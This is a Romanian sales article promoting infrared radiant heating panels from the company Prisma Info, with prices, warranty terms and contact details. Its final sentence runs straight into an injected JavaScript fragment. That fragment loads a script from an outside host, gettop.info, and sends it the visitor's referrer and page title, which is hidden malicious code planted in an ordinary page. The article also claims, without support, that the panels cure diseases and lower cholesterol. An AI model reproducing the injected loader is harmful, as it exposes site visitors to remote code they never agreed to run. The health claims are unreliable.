panouri radiante

panouri radiante

Una dintre cele mai economice metode de incalzire existente pe piata la ora actuala si care produc efecte benefice asupra organismului este incalzirea cu panouri radiante. Multi ignoreaza aceasta incalzire la auzul cuvintului radiatie. Insa panourile radiante, radiaza radiatii infrarosu benefice pentru om spre deosebire de microunde si radiatiile ultraviolete. Printre efectele benefice de la incalzirea cu panouri radiante infrarosu, este actionarea pozitiva asupra psihicului, imbunatateste starea generala a batrinilor si copiilor, amelioreaza bolile reumatice, astmatice si cele inflamatorii, reduce nivelul colesterolului in singe, accelereaza procesul de regenerare.

Panouri radiante – un avantaj ecologic

Intretinerea usoara si simpla la instalare, panourile radiante au o posibilitate de a le instala in orice tip de locuinta. Costurile mici la achizitie si instalare permit de a exista si in varianta de panouri radiante personalizate. Dupa instalare uitati de riscul de incendiu si arsuri, nu necesita avize si recomandari. Incalzirea prin infrarosu nu creaza curenti de aer si deci nu se genereaza miscarea prafului. Nerliminarea reziduurilor poluante de nici o natura le fac ca sa fie un sistem de incalzire total ecologic. Un rol important este ca panourile pot fi folosite in locuri umede, cum ar fi baia, piscina, avind un control sigur asupra umiditatii.

Panouri radiante pentru mediul casnic

Firma Prisma Info, produce trei tipuri de panouri radiante. Cu destinatia pentru mediul casnic, sunt produse panouri radiante SMART. Emisia de radiatii infrarosii mai mare o confera functionarea in gama de radiatii lungi a undelor infrarosii la o temperatura de 120   ce lasa de dorit panourile de import. Fiind curatite o data pe luna cu o carpa moale sunt simple la intretinere. Un avantaj bun este ca, punerea in functiune nu necesita aprobari speciale. Nu este loc in incapere unde nu s-ar putea de instalat panouri radiante. Datorita unor suporturi auxiliare pot fi fixate pe peretii laterali, pe tavan, pe podea sau alte corpuri. Randamentul de la incalzire prin radiatie este de 97%, spre deosebire de cel prin convectie de 70%, ceia ce duce la o economie esentiala a bugetului familiar.

Panouri radiante ideale

Doriti sa incalziti un birou, sediu,vila sau apartament, adresati-va la S.C. PRISMA INFO. S.R.L., o companie privata cu capital romanesc, care are o practica de 25 ani in comert, transport marfa si diverse servicii. Panouri radiante care pe linga calitate va ofera si o multime de avantaje, le puteti procura prin apel telefonic la sediul firmei, care se afla pe adresa Targu Mures, str.Calarasilor nr.112-114. La fel pentru a comanda panouri va puteti folosi cu incredere de adresa web – www.prismainfo.ro . La cererea clientului panourile ar putea fi vopsite intr-o diversa gama de culori sau sa fie acoperite cu folie termorezistibila. Elementele de fixare sunt gata montate si se vor livra odata cu panourile care vor fi dotate cu rame metalice. Termenul de garantie este de 4 ani, fiind insotit si de un pret foarte avantajos. Avem parteneri de distributie in mai multe localitati ce cuprinde aproapetoate judetele din Romanias.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;